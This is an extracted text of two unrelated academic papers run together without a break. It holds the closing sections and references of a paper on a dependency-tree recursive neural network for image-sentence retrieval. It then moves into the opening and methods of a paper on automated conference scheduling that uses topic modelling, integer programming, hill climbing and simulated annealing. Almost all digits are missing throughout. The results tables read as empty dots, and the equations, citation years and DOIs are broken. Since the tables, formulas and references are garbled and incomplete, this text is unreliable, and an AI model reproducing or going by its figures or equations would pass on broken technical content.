while a man behind stands pointing. figure : images and their sentence descriptions assigned by the dt-rnn. image search model mrank r@ r@ r@ bow . . . . kcca . . . . sdt-rnn . . . . describing images bow . . . . kcca . . . . sdt-rnn . . . . table : evaluation comparison between mean rank of the closest correct image or sentence (lower is better ) with recall at different thresholds (higher is better, ). with one exception (r@ , bottom table), the sdt-rnn outperforms the other two models and all other models we did not include here. this different metric. table shows that the mea- sures do correlate well and the sdt-rnn also per- forms best on the multimodal ranking tasks when evaluated with this measure. . error analysis in order to understand the main problems with the composed sentence vectors, we analyze the sen- tences that have the worst nearest neighbor rank be- tween each other. we find that the main failure mode of the sdt-rnn occurs when a sentence that should describe the same image does not use a verb but the other sentences of that image do include a verb. for example, the following sentence pair has vectors that are very far apart from each other even though they are supposed to describe the same image: . a blue and yellow airplane flying straight down while emitting white smoke . airplane in dive position generally, as long as both sentences either have a verb or do not, the sdt-rnn is more robust to dif- ferent sentence lengths than bag of words represen- tations. . model analysis: semantic composition matrices the best model uses composition matrices based on semantic relationships from the dependency parser. we give some insights into what the model learns by listing the composition matrices with the largest frobenius norms. intuitively, these matrices have learned larger weights that are being multiplied with the child vector in the tree and hence that child will have more weight in the final composed parent vec- tor. in decreasing order of frobenius norm, the re- lationship matrices are: nominal subject, possession modifier (e.g. their), passive auxiliary, preposition at, preposition in front of, passive auxiliary, passive nominal subject, object of preposition, preposition in and preposition on. the model learns that nouns are very important as well as their spatial prepositions and adjectives. conclusion we introduced a new recursive neural network model that is based on dependency trees. for eval- uation, we use the challenging task of mapping sen- tences and images into a common space for finding one from the other. our new model outperforms baselines and other commonly used models that can compute continuous vector representations for sen- tences. in comparison to related models, the dt- rnn is more invariant and robust to surface changes such as word order. references g. andrew, r. arora, k. livescu, and j. bilmes. . deep canonical correlation analysis. in icml, at- lanta, georgia. k. barnard, p. duygulu, n. de freitas, d. forsyth, d. blei, and m. jordan. . matching words and pictures. jmlr. m. baroni and a. lenci. . distributional mem- ory: a general framework for corpus-based semantics. computational linguistics, ( ): – . r. collobert and j. weston. . a unified archi- tecture for natural language processing: deep neural networks with multitask learning. in proceedings of icml, pages – . f. costa, p. frasconi, v. lombardo, and g. soda. . towards incremental parsing of natural language using recursive neural networks. applied intelligence. m. de marneffe, b. maccartney, and c. d. manning. . generating typed dependency parses from phrase structure parses. in lrec. j. dean, g. s. corrado, r. monga, k. chen, m. devin, q. v. le, m. z. mao, m. ranzato, a. senior, p. tucker, k. yang, and a.y. ng. . large scale distributed deep networks. in nips. j. deng, w. dong, r. socher, l.-j. li, k. li, and l. fei- fei. . imagenet: a large-scale hierarchical im- age database. in cvpr. j. duchi, e. hazan, and y. singer. . adaptive sub- gradient methods for online learning and stochastic op- timization. jmlr, , july. p. duygulu, k. barnard, n. de freitas, and d. forsyth. . object recognition as machine translation. in eccv. a. farhadi, m. hejrati, m. a. sadeghi, p. young, c. rashtchian, j. hockenmaier, and d. forsyth. . every picture tells a story: generating sentences from images. in eccv. y. feng and m. lapata. . automatic caption gen- eration for news images. ieee trans. pattern anal. mach. intell., . a. frome, g. corrado, j. shlens, s. bengio, j. dean, m. ranzato, and t. mikolov. . devise: a deep visual-semantic embedding model. in nips. c. goller and a. küchler. . learning task- dependent distributed representations by backpropaga- tion through structure. in proceedings of the interna- tional conference on neural networks. e. grefenstette, g. dinu, y.-z. zhang, m. sadrzadeh, and m. baroni. . multi-step regression learning for compositional distributional semantics. in iwcs. a. gupta and l. s. davis. . beyond nouns: exploit- ing prepositions and comparative adjectives for learn- ing visual classifiers. in eccv. m. hodosh, p. young, and j. hockenmaier. . fram- ing image description as a ranking task: data, mod- els and evaluation metrics. j. artif. intell. res. (jair), : – . e. h. huang, r. socher, c. d. manning, and a. y. ng. . improving word representations via global context and multiple word prototypes. in acl. k. jarrett, k. kavukcuoglu, m.a. ranzato, and y. le- cun. . what is the best multi-stage architecture for object recognition? in iccv. p. blunsom. k.m. hermann. . the role of syntax in vector space models of compositional semantics. in acl. a. krizhevsky, i. sutskever, and g. e. hinton. . imagenet classification with deep convolutional neural networks. in nips. g. kulkarni, v. premraj, s. dhar, s. li, y. choi, a. c. berg, and t. l. berg. . baby talk: understanding and generating image descriptions. in cvpr. n. kumar, a. c. berg, p. n. belhumeur, , and s. k. na- yar. . attribute and simile classifiers for face ver- ification. in iccv. p. kuznetsova, v. ordonez, a. c. berg, t. l. berg, and yejin choi. . collective generation of natural image descriptions. in acl. q. v. le, m.a. ranzato, r. monga, m. devin, k. chen, g.s. corrado, j. dean, and a. y. ng. . build- ing high-level features using large scale unsupervised learning. in icml. t. mikolov, w. yih, and g. zweig. . linguistic regularities in continuous spaceword representations. in hlt-naacl. j. mitchell and m. lapata. . composition in dis- tributional models of semantics. cognitive science, ( ): – . j. ngiam, a. khosla, m. kim, j. nam, h. lee, and a.y. ng. . multimodal deep learning. in icml. v. ordonez, g. kulkarni, and t. l. berg. . im text: describing images using million captioned pho- tographs. in nips. j. b. pollack. . recursive distributed representa- tions. artificial intelligence, , november. c. rashtchian, p. young, m. hodosh, and j. hocken- maier. . collecting image annotations using amazon’s mechanical turk. in workshop on creat- ing speech and language data with amazon’s mturk. r. socher and l. fei-fei. . connecting modalities: semi-supervised segmentation and annotation of im- ages using unaligned text corpora. in cvpr. r. socher, c. d. manning, and a. y. ng. . learning continuous phrase representations and syntactic pars- ing with recursive neural networks. in proceedings of the nips- deep learning and unsupervised fea- ture learning workshop. r. socher, e. h. huang, j. pennington, a. y. ng, and c. d. manning. a. dynamic pooling and unfold- ing recursive autoencoders for paraphrase detection. in nips. r. socher, c. lin, a. y. ng, and c.d. manning. b. parsing natural scenes and natural language with recursive neural networks. in icml. r. socher, j. pennington, e. h. huang, a. y. ng, and c. d. manning. c. semi-supervised recursive autoencoders for predicting sentiment distributions. in emnlp. r. socher, b. huval, c. d. manning, and a. y. ng. . semantic compositionality through recursive matrix-vector spaces. in emnlp. r. socher, j. bauer, c. d. manning, and a. y. ng. a. parsing with compositional vector grammars. in acl. r. socher, m. ganjoo, c. d. manning, and a. y. ng. b. zero-shot learning through cross-modal transfer. in nips. r. socher, m. ganjoo, h. sridhar, o. bastani, and a. y. ng. c. d. manning and. c. zero-shot learn- ing through cross-modal transfer. in proceedings of the international conference on learning representa- tions (iclr, workshop track). n. srivastava and r. salakhutdinov. . multimodal learning with deep boltzmann machines. in nips. a. torralba, k. p. murphy, and w. t. freeman. . using the forest to see the trees: exploiting context for visual object detection and localization. communica- tions of the acm. p. d. turney and p. pantel. . from frequency to meaning: vector space models of semantics. journal of artificial intelligence research, : – . b. yao, x. yang, l. lin, m. w. lee, and s.-c. zhu. . i t:image parsing to text description. ieee xplore. submitted january accepted october published november corresponding author prashanti manda, p_manda@uncg.edu academic editor christopher mungall additional information and declarations can be found on page doi . /peerj-cs. copyright manda et al. distributed under creative commons cc-by . open access avoiding ‘‘conflicts of interest’’: a computational approach to scheduling parallel conference tracks and its human evaluation prashanti manda , alexander hahn , katherine beekman and todd j. vision department of computer science, university of north carolina at greensboro, greensboro, nc, united states of america department of computer science, university of southern california, los angeles, united states of america roi revolution inc., raleigh, nc, united states of america department of biology, university of north carolina at chapel hill, chapel hill, nc, united states of america abstract conferences with contributed talks grouped into multiple concurrent sessions pose an interesting scheduling problem. from an attendee’s perspective, choosing which talks to visit when there are many concurrent sessions is challenging since an individual may be interested in topics that are discussed in different sessions simultaneously. the frequency of topically similar talks in different concurrent sessions is, in fact, a common cause for complaint in post-conference surveys. here, we introduce a practical solution to the conference scheduling problem by heuristic optimization of an objective function that weighs the occurrence of both topically similar talks in one session and topically different talks in concurrent sessions. rather than clustering talks based on a limited number of preconceived topics, we employ a topic model to allow the topics to naturally emerge from the corpus of contributed talk titles and abstracts. we then measure the topical distance between all pairs of talks. heuristic optimization of preliminary schedules seeks to balance the topical similarity of talks within a session and the dissimilarity between concurrent sessions. using an ecology conference as a test case, we find that stochastic optimization dramatically improves the objective function relative to the schedule manually produced by the program committee. approximate integer linear programming can be used to provide a partially-optimized starting schedule, but the final value of the discrimination ratio (an objective function used to estimate coherence within a session and disparity between concurrent sessions) is surprisingly insensitive to the starting schedule. furthermore, we show that, in contrast to the manual process, arbitrary scheduling constraints are straightforward to include. we applied our method to a second biology conference with over , contributed talks plus scheduling constraints. in a randomized experiment, biologists responded similarly to a machine-optimized schedule and a highly modified schedule produced by domain experts on the conference program committee. subjects artificial intelligence, computer education, data mining and machine learning, digital libraries, social computing keywords topic modeling, optimization, conference scheduling how to cite this article manda p, hahn a, beekman k, vision tj. . avoiding ‘‘conflicts of interest’’: a computational approach to scheduling parallel conference tracks and its human evaluation. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:p_manda@uncg.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. figure two steps in the process of manually assigning talks to sessions for the american physi- cal society march meeting. photos courtesy of dr. karen daniels. photo credit to dr. daphne klotsa. full-size doi: . /peerjcs. /fig- introduction researchers and educators depend upon professional conferences to showcase their work and stay current on the work of their peers. thousands of such conferences are held each year worldwide, and conferences that feature of hundreds of oral presentations are not unusual. such large conferences often schedule oral presentations in concurrent sessions so that each presentation can be allocated adequate time while keeping the overall conference duration to only a few days. conference scheduling is typically done manually by program organizers who review the large volume of talk submissions, decide which talks are similar to each other, and group similar talks into sessions accordingly (fig. ). they do this based on the information provided by prospective presenters, which invariably includes a title but may also include keywords, topic categories and/or an abstract. this is a tedious and often error-prone process, done in some cases under considerable time pressure, that is not easily scaled and can lead to sub-optimal conference schedules (hillis, ). since conference attendees typically aim to attend those talks most relevant to their interests, the ideal conference schedule will not only ensure similarity of topics within a session, but also avoid topical conflict among concurrent sessions. in practice, identifying similarity among talks is a highly subjective process. research talks often have several dimensions; a talk presenting an efficient key distribution scheme for asymmetric cryptography is related to key distribution algorithms, network security, and cryptographic algorithms. talk a might be more similar to talk b on one dimension but more similar to talk c on a different dimension. depending on their areas of expertise, different organizers might weight those dimensions differently, and the weights of the organizers may or may not be representative of the conference attendees. even if the measure of similarity were not subjective, ensuring a high level of dissimilarity among concurrent sessions, each with multiple talks, is a challenging task for humans, as it requires perception of the distribution of many points in a highly multidimensional space. this can lead to schedules with conflict between concurrent sessions even when the manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. talks within each individual session appear similar. ensuring a high level of dissimilarity among concurrent sessions is important to minimize participants having to move between sessions, or having to choose between co-occurring talks of equal interest. vangerven et al. ( ) also note that dissimilarity between concurrent sessions is important for enabling participants to attend the talks of most interest to them without encountering scheduling conflicts, as might happen when talks of a similar topical nature are scheduled in concurrent sessions. adding to the complexity of the conference scheduling task is the fact that organizers typically have to accommodate idiosyncratic scheduling constraints due to the travel schedules and other obligations of individual presenters. efficient and automated data- driven solutions to overcome the problems would be desirable. the conference scheduling problem imagine a conference with q talks scheduled across w days with a maximum of n timeslots per day, each with a maximum of cmax concurrent sessions. a session is defined as a sequence of talks scheduled during one timeslot in one room. the maximum number of talks in a session is predefined by the organizers and does not vary across the schedule. sessions are considered concurrent when they are scheduled in the same timeslot. timeslots are non-overlapping. we define the conference scheduling problem as the task of assigning talks to timeslots and concurrent sessions so as to maximize coherence within a session and minimize similarity between concurrent sessions (i.e., those within the same timeslot). in this work, we describe a heuristic solution to the conference scheduling problem that creates optimized conference schedules with multiple concurrent sessions in a fully automated fashion. first, we propose the use of a data-driven machine-learning approach, topic modeling (wallach, ), to infer similarity between talks. we use topic modeling to identify a set of latent topics relevant to the full set of talks being presented at a conference. each talk can then be represented as a weighted vector of these different topics, and we can compare these vectors as a measure of similarity. thus, topic modeling provides a principled way to decide upon which dimensions to consider, and how to weigh those dimensions, in measuring similarity (between talks, between sessions, or between talks and sessions). second, we present a suite of heuristic schedule creation approaches designed to maximize an objective function that quantifies session coherence and dissimilarity between concurrent sessions in a single metric. we explore different strategies to create initial schedules, including a greedy heuristic, random assignment, and integer linear programming. we then explore different stochastic optimization strategies to further improve upon the initial schedules (spall, ), and investigate how the optimality of the initial schedule impacts the final result. we selected a high-performing combination of approaches that improved upon a manually produced schedule for a recently held ecology conference. using this combination of approaches, we then created an automated schedule for a large evolutionary biology conference that had not yet been held, in collaboration with the conference organizing manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. committee. the organizing committee made major, manual modifications to produce the final schedule that was used. after the evolutionary biology conference was held, we conducted an experiment where biologists with expertise in that field were presented with samples of the concurrent sessions from both the machine-generated and manually-modified schedules in order to elicit their subjective opinions about session coherence and conflict among concurrent sessions. this provided an evaluation of how well the discrimination ratio captured the topic dimensions that mattered to experts in the field who would be representative of conference attendees. related work surprisingly, given the pervasive exposure of academics to the challenges of conference scheduling, there is a relatively small literature on the problem (reviewed in vangerven et al. ( )). bhardwaj et al. ( ) and andré et al. ( ) incorporate attendee preferences for talk and session placement in a community-informed conference scheduling approach (sampson, ; kim et al., ; chilton et al., ). in sampson ( ), conference attendees submit time preferences for their talk. the scheduling algorithm, a modification of the simulated annealing heuristic, then attempts to accommodate participant preferences using the number of preferences accommodated as the objective function. similarly, kim et al. ( ) and chilton et al. ( ) use community sourced preferences for talk and session placement to guide the scheduling process. conference attendees are asked to submit their preferences as to which talks should be scheduled with their own talk and which talks belonged in similarly themed sessions that should not be scheduled concurrently to one another. these preferences are encoded into a scheduling interface that is then used by organizers to create and schedule sessions with the aim of maximizing the number of preferences accommodated while resolving author, talk, and session conflicts. in contrast to our approach, the actual scheduling process is manual. edis & edis ( ) approach the scheduling problem using an integer programming (ip) formulation in which each talk is assigned a topic and talks are assigned to a session so that all talks in the session have the same topic. houlding & haslett ( ) describe a clustering algorithm to group similar talks into fixed size clusters (or sessions), using a local objective function that maximizes the similarity of talk pairs assigned to a cluster at each step. to measure similarity between talks, participants are asked to select three relevant sessions for their talk. the co-occurrence frequency of session topics is then used to determine similarity between talks and sessions. gulati & sengupta ( ) use an augmented objective function that incorporates a prediction of a talk’s popularity based on reviewer comments and participant preferences of time slots. the goal of the schedule is to maximize session attendance. the work uses a greedy scheduling algorithm, but no empirical results or computational analysis are presented. ibrahim, ramli & hassan ( ) focus on assigning talks to time slots across a number of days in concurrent sessions. each talk belongs to a field or topic and the goal is avoid scheduling talks of the same topic concurrently. the study presents methods based on combinatorial design theory for three conferences used as case-studies. the study does not address how talks are grouped into sessions. quesnelle & steffy ( ) consider an optimization problem that assigns talks to manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. timeslots and rooms such that scheduling conflicts are minimized while accounting for presenter and room availabilities. potthoff & munger ( ) apply integer programming to assign sessions to time periods in a way that sessions for each subject area are spread evenly across time slots. similarly, nicholls ( ) assign sessions to rooms and time periods to avoid presenters being scheduled in two concurrent sessions while trying to maximize presenter preferences in the schedule. both of the above assume that the clustering of similar talks into sessions has already been accomplished. nicholls ( ) and eglese & rand ( ) aim to optimize participant satisfaction by collecting participant preferred sessions. in eglese & rand ( ), a simulated annealing algorithm assigns sessions to time periods with the aim of minimizing the sum of the weighted violations of session preferences. le page ( ) requires participants to provide the number of sessions they would like to attend. they build a conflict matrix containing the number of people that wish to attend both session i and j. the goal is to assign sessions to timeslots such that the sum of conflicts between simultaneous sessions is minimized. sessions with the same topic must be assigned to the same room. the authors propose a semi-automated heuristic consisting of four steps that was used to schedule a meeting of the american crystallographic association. among the few studies to address the problem of grouping similar talks into sessions were tanaka, mori & bargiela ( ) and tanaka & mori ( ). they use a set of user assigned keywords for each talk and use an objective function that is a nonlinear utility function of common keywords. the intuition behind the approach is that papers in the same session have as much overlap in keywords as possible. they use kohonen’s self organizing maps (tanaka, mori & bargiela, ) and a hybrid grouping genetic algorithm (tanaka & mori, ). vangerven et al. ( ) present a method that approaches the conference scheduling problem in three phases. the first phase aims to maximize total attendance, based on the participants’ preferences. the second phase tries to minimize the total number of session hops or minimizing the amount of topical overlap between concurrent sessions. the third phase aims to accommodate presenter preferences and availabilities by minimizing the total number of preferences violated. stidsen, pisinger & vigo ( ) approach conference scheduling using a number of optimization models each with a specific objective. research fields are assigned to buildings with the aim of assigning related areas to buildings physically close to each other. each session is assigned to one room. finally, the solution optimizes assignment of sessions to room sizes. despite these research contributions, the practice of manual scheduling is still widespread, and not all factors that would allow for a practical automated solution have been considered by researchers. compared to previous work, our approach is novel in its use of topic modeling to measure talk similarity in multiple dimensions, stochastic optimization of a global objective function that ensures both similarity within a session and disparity between concurrent sessions, and the lack of a need for human intervention. manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. methods we first provide a description of the different parameters and variables (‘preliminaries’) used through ‘methods’. then, we present details about creating the corpus of documents (‘creating the corpus for topic modeling) for topic modeling along with topic modeling algorithms used (‘topic modeling’). next, we describe how similarity between talks and sessions will be computed using outputs from the topic model (‘computing similarity between talks and sessions). an objective function called the discrimination ratio to quantify the similarity of talks within a session vs. disparity between concurrent sessions will be presented (‘an objective function for conference scheduling ’an objective function for conference scheduling’). finally, we outline heuristic approaches for creating initial schedules (‘creation of initial schedules’) and for optimizing the initial schedules (‘stochastic optimization’). preliminaries a conference schedule is composed of w days, each with n timeslots, with a total of q talks. each timeslot is further divided into a maximum of cmax concurrent sessions. two sessions are considered to be concurrent if the starting and ending time of the sessions are the same. the number of concurrent sessions in any given timeslot i is represented by ci. each session can contain a maximum of tmax talks. a session is a sequence of talks scheduled during one timeslot in one room. for a given session j, the number of talks in the session is represented by tj. talks in a particular timeslot and a particular session can be referred to in the order in which they’re scheduled. ti,j,k represents the kth talk in session j of timeslot i. the topic modeling algorithm takes as input the number of topics (g) to be generated from the corpus of q talks. the algorithm outputs a vector representation (evi) of each talk as a weighted vector over the g topics. the vector contains the probabilistic relevance of each topic to a talk. for example, vi, is the probabilistic relevance of topic to talk ti (the ith talk in a session). a pairwise similarity matrix (m) is computed from the above vector representation that contains the cosine similarity (s) between vectors ( ev , ev ) of every pair of talks in the corpus. the cosine similarity, s, of two vectors has a minimum of - and a maximum of . an objective function, discrimination ratio (d), is defined as the ratio of the mean talk similarity within a session (sw) to the mean talk similarity between concurrent sessions (sb) across the full schedule. initial schedules can be created using the random, greedy, or ilp approaches (‘creation of initial schedules’). these approaches take the number of days in the conference (w ), number of timeslots per day (n), maximum number of concurrent sessions in a timeslot (cmax), maximum number of talks in each concurrent session (tmax), and the pairwise talk similarity matrix (m). we present two variants each of a hill climbing (hc) and a simulated annealing (sa) algorithm that further optimize the initial schedules. for the hc and sa approaches, we experiment with a version (hca, saa) that optimizes the objective function directly and another (hca, saa) that splits the optimization into two stages - first maximizing within-session similarity and then minimizing between-session similarity. all four variants manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table parameters and variables used in the topic modeling, schedule creation, and optimization ap- proaches. parameter description i input starting schedule created using the random, greedy, or integer linear programming (ilp) approaches. d discrimination ratio n number of timeslots in a schedule ni timeslot i cmax maximum number of concurrent sessions in a timeslot c number of concurrent sessions ci number of concurrent sessions in timeslot i tmax maximum number of talks in a session t number of talks tj number of talks in session j q number of talks in a schedule ti,j,k kth talk in session j of timeslot i s( ev , ev ) cosine similarity between the vector representations of two talks sw mean intra-session similarity of a schedule sb mean inter-session similarity of a schedule m pairwise talk similarity matrix y number of seed talks for the greedy algorithm x number of clusters created by the kruskal’s algorithm xi ith kruskal’s cluster txi number of talks in cluster xi axi attractor talk for cluster i z initial temperature zi temperature at the ith swap. z = , . α constant set to . r number of parallel optimizations runs for an optimization algorithm e number of maximum swaps for an optimization algorithm w number of days in a conference l dictionary of scheduling constraints g number of topics in the topic model vi,j probabilistic relevance of topic j to talk ti (hca, hcb, saa, sab) take a starting schedule (i), the number of parallel optimization runs (r), the maximum number of swaps (e), and a pairwise talk similarity matrix (m). the approaches can optionally take a list of scheduling constraints encoded as a dictionary (l). in addition, the sa versions (saa sab) take an initial temperature (z) and a constant (α= . ). these parameters are further defined in ‘simulated annealing’. for ease of reference, the parameters and variables are listed in table . manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. creating the corpus for topic modeling the corpus of documents that is input to the topic model is the set of talks for a conference. in our implementation, each document included the title and abstract for a single talk. to ensure that the corpus only contained meaningful words that reflect the semantic content of talks, stemming and stop word removal were applied. stemming reduces variants of words to their base or root form (lovins, ; porter, ; porter, ), making it easier for the topic modeling algorithm to recognize words with the same meaning. stop words are commonly used words (such as ‘and’, ‘it’, and ‘the’) that have little value with respect to the meaning of the text (fox, ). python’s natural language toolkit (nltk - https://www.nltk.org) provides a set of commonly used english words that was used as the initial stop word list. for the second conference, evolution , domain experts on the conference organizing committee added additional stop words, leading to a total of stop words. topic modeling we used latent dirichlet allocation (lda), a generative probabilistic model often used to describe collections of text corpora and one of the most widely used topic modeling algorithms (blei, ng & jordan, ). lda models each document as a finite mixture over an underlying set of latent topics, and each latent topic as a probabilistic mixture over relevant words. the model assumes dirichlet priors over the latent topics in a document and relevant words within a topic. one of the input parameters to the lda algorithm is the number of topics to identify from the corpus. several preliminary topic models were created using different numbers. we developed a metric, the match percentage, to compare the fit of different models. for each model, the top two words from each of the top three topics of a talk were used to create a set of six keywords. the fraction of keywords found within the title and abstract was computed for each talk and the match percentage was computed as the mean of this fraction across all talks, expressed as a percentage. the topic model with the highest match percentage was chosen for subsequent analyses. while there are automated metrics, such as perplexity (blei & lafferty, ), to evaluate topic models, studies that have tested these metrics of evaluating topic models have reported that inferences based on these measures were negatively correlated with human perception (chang et al., ; chang & blei, ). these studies also suggest that topic models should be chosen by human analysis of coherence of topics inferred by a model, words in topics etc. instead of trying to optimize likelihood based measures (chang & blei, ). computing similarity between talks and sessions lda outputs a representation of each talk in the corpus as a weighted vector over all the latent topics. in a model with g topics, the vector evi of talk ti is defined as evi=(vi, ,vi, ,...,vi,g) ( ) where i is the talk number manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.nltk.org http://dx.doi.org/ . /peerj-cs. vi, is the probabilistic relevance of topic to talk ti from this, a pairwise similarity matrix, m, is computed by calculating the cosine similarity (s) of the two vectors, ev and ev , for every pair of talks in the corpus. s( ev , ev )= ∑g j= v ,jv ,j√∑g j= (v ,j) √∑g j= (v ,j) . ( ) an objective function for conference scheduling we introduce an objective function called the discrimination ratio, d, to quantify in one measure the similarity of talks within each session and the disparity between talks in concurrent sessions. d is defined as the ratio of the mean within-session similarity to the mean between-session similarity across the full schedule. d is higher (> ) when the mean within-session similarity is higher as compared to mean between-session similarity in a schedule. lower d values (< ) indicate that the mean within-session similarity is lower as compared to mean between-session similarity in a schedule. d is when the mean within-session similarity is same as the mean between-session similarity. the mean within-session similarity, sw, is the mean of the pairwise similarities between all the talks within each session. sw = ∑n i= ∑ci j= ∑tj− k= ∑tj l=k+ s(ti,j,k,ti,j,l)∑n i= ∑ci j= ( tj ) ( ) where n is the number of timeslots in the schedule, ci is number of concurrent sessions in timeslot i, tj is number of talks in session j, and s(ti,j,k,ti,j,l) (from eq. ( )) is the cosine similarity between talk k in timeslot i, session j and talk l in timeslot i, session j. the mean between-session similarity, sb, is the mean of the pairwise similarities between all the talks in different concurrent sessions. sb= ∑n i= ∑ci j= ∑tj k= ∑ci l=j+ ∑tl m= s(ti,j,k,ti,l,m)∑n i= ∑ci j= ∑tj k= ∑ci l=j+ ∑tl m= ( ) the discrimination ratio is defined as d=sw/sb. d is inspired by other commonly used metrics used to evaluate the quality of clusters generated by clustering algorithms, such as k-means. such commonly used metrics include the error sum of squares (sse)—the sum of the squared differences between each observation and its cluster’s mean (celebi, kingravi & vela, ), intercluster distance (gonzalez, )—the sum of the squared distances between each cluster’s centroid, or intracluster distance—the sum of the squared distances between an item and its cluster’s centroid. creation of initial schedules we consider three approaches for the creation of initial schedules: random, greedy, and integer linear programming (ilp). manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. random the random assignment algorithm provides a baseline against which to compare the performance of approaches that explicitly optimize the objective function. given a set of talks and scheduling parameters as in ‘preliminaries’, this algorithm assigns talks to sessions through sampling with replacement with no consideration of talk similarities or the value of the objective function. greedy the greedy assignment algorithm generates a semi-optimal schedule for further stochastic optimization. in addition to the parameters in ‘preliminaries’, the algorithm requires a set of y seed talks that are selected based on an input threshold of minimum dissimilarity between each other. first, the algorithm finds a session for each seed talk such as to maximize the objective function. next, the rest of the talks are assigned to sessions by choosing the most locally optimal solution at each step. integer linear programming we cast the problem of scheduling the conference as an integer linear program (ilp) using a variable reduction technique that was solved using ampl (gay & kernighan, ) with the cplex solver (http://www.cplex.com). an integer linear program (ilp) consists of variables, constraints, and an objective function where some or all of the variables take on integer values (bosch & trick, ). non-integer variables have numeric values that are limited to a feasible region by the constraints. the objective function determines the assignment of values to the variables that results in an optimal solution. both the constraints and the objective function must be linear in the variables. in our implementation, a heuristic pre-processing step first groups the talks into x clusters of similar talks using a modified version of kruskal’s algorithm (kruskal, ), a greedy algorithm that is used to find a minimum spanning tree from a weighted graph of nodes. in this work, nodes represent talks while edge weights represent pairwise talk similarity. we use a modification of kruskal’s algorithm to find a number of disjoint maximum-weight spanning trees from the graph. each disjoint spanning tree is a cluster that groups similar talks while the spanning trees are sufficiently distant from each other. at the beginning of the algorithm, each talk forms its own cluster. at each iteration of the algorithm, the pair of talks with the highest edge weight (similarity score) is selected. if the two talks are in separate clusters, the clusters are merged to form a bigger cluster. the algorithm is terminated as soon as x disjoint and distant clusters of similar talks are created. a representative talk called the attractor (axi), is then chosen from each of the x clusters. the aim is to produce a set of initial input talks for the ilp that are highly different from each other, while ensuring that each attractor has many other talks similar to it. we choose as the attractor the talk that has the highest similarity to all other talks in its cluster. if there are multiple talks that qualify as attractors, one of those talks is chosen randomly. manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.cplex.com http://dx.doi.org/ . /peerj-cs. we calculate a fit score (f) for each talk tj in cluster xi as follows. f(tj,xi)=max txi k= s(tj,tk) : j =k ( ) where txi is the number of talks in cluster xi the talk tj with the maximum value of f is chosen as the attractor for cluster xi. this list of attractors is then input to the ilp, which optimally assigns one attractor to each concurrent session in the schedule and assigns talks to sessions so as to maximize the sum of similarities between the attractor and all the other talks in that session. in addition, the ilp requires the following constraints: each session i is assigned no more than tmax talks, exactly ci attractors must be assigned to each timeslot ni, and each talk must be assigned to only one session. we made no effort to ensure distinctness of the initial schedules either within or between the three approaches. stochastic optimization we developed two variants each of a hill climbing algorithm and a simulated annealing algorithm to further improve upon the initial schedules (obtained from the random, greedy, and ilp approaches) by iteratively proposing swaps in the positions of talks in the schedule. the hill climbing (hc) approaches accept solutions from a swap only when they increase the discrimination ratio, and are thus susceptible to being trapped in local optima. by contrast, the simulated annealing (sa) approaches will accept solutions that decrease d with a certain probability, and thus have the potential/possibility to escape local optima (kirkpatrick, gelatt & vecchi, ). each optimization algorithm takes one or more initial schedules as input and spawns r parallel optimization runs to produce r optimized schedules at the end of execution. if the input schedule is random, each parallel run starts with an independently generated schedule, while if the input schedule is a greedy or an ilp schedule, all parallel runs operate on the same input. the schedule with the highest discrimination ratio among the r optimized schedules is chosen as the output of the algorithm. the input parameters to the optimization approaches are given in ‘preliminaries’. simulated annealing for simulated annealing, we used the kirkpatrick acceptance probability function (eq. ( )) to determine the probability of accepting a solution resulting from a swap (kirkpatrick, gelatt & vecchi, ). k(dj,di)= { if dj <dir e−(dj−di)/zi otherwise ( ) where di and dj are the discrimination ratios of the schedule under the proposed swap and after the last accepted swap, respectively; z is the initial ‘‘temperature’’, and zi is the current temperature at timestep i defined as zi=zi− α. manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the decreasing temperature values reduce the probability of accepting worse solutions as the number of swaps increases. since the algorithm might accept worse solutions, the best solution encountered at any point of time is stored to be reported at the end of execution. sequential optimization in working with the organizing committee for the evolution conference, we observed that users were more sensitive to maximizing coherence within a session than disparity between concurrent sessions. in order to emulate this aspect of human scheduling, we developed variants of the hc and sa approaches that split the optimization algorithm into two sequential regimes, the first optimizing for within-session similarity alone and the second for between-session disparity alone. between-session disparity is optimized by proposing a swap of two randomly selected sessions in each iteration. this has no effect on within-session similarity since swapping is conducted on sessions and not talks. the sequential optimization regimes are stopped when further swapping does not result in improvement. we refer to the versions of the hc and sa approaches in which d is optimized directly throughout as hca and saa, respectively, and the approaches in which the schedule is first optimized for within-session similarity as hcb and sab, respectively. see algorithms – for pseudocode describing the four optimization approaches. scheduling constraints in practice, a conference will typically have constraints that restrict the sessions or timeslots a talk can be placed in. reasons may include talks competing for awards that must scheduled early in the conference in order to allow time for judging; presenters with multiple talks that cannot be scheduled in concurrent sessions within the same timeslot; presenters who are scheduled to arrive at the conference after it begins or before it is finished; or requests for complementary talks to be scheduled in the same session. these constraints can be accommodated by the optimization approaches described above by requiring them to be satisfied in any solution obtained. in our implementation, such scheduling constraints were encoded as a dictionary (l) that maps each talk to a set of sessions in which the talk can be placed without violating any scheduling constraints. for example, in a schedule with five sessions (labeled through ), if a constraint prevents talk ti from being scheduled in session , the constraint would be encoded in the dictionary as l[ti]={ , , , }. each proposed swap was checked for constraint violations before being accepted. if there is no feasible solution due to conflicting constraints, no solution is returned. results the datasets for the two conferences used in this work, ecology and evolution , are summarized in table . we first tested our topic modeling, schedule creation and optimization approaches on select concurrent sessions from ecology . the manually created schedule for this conference gave us a point of comparison for the automated schedules 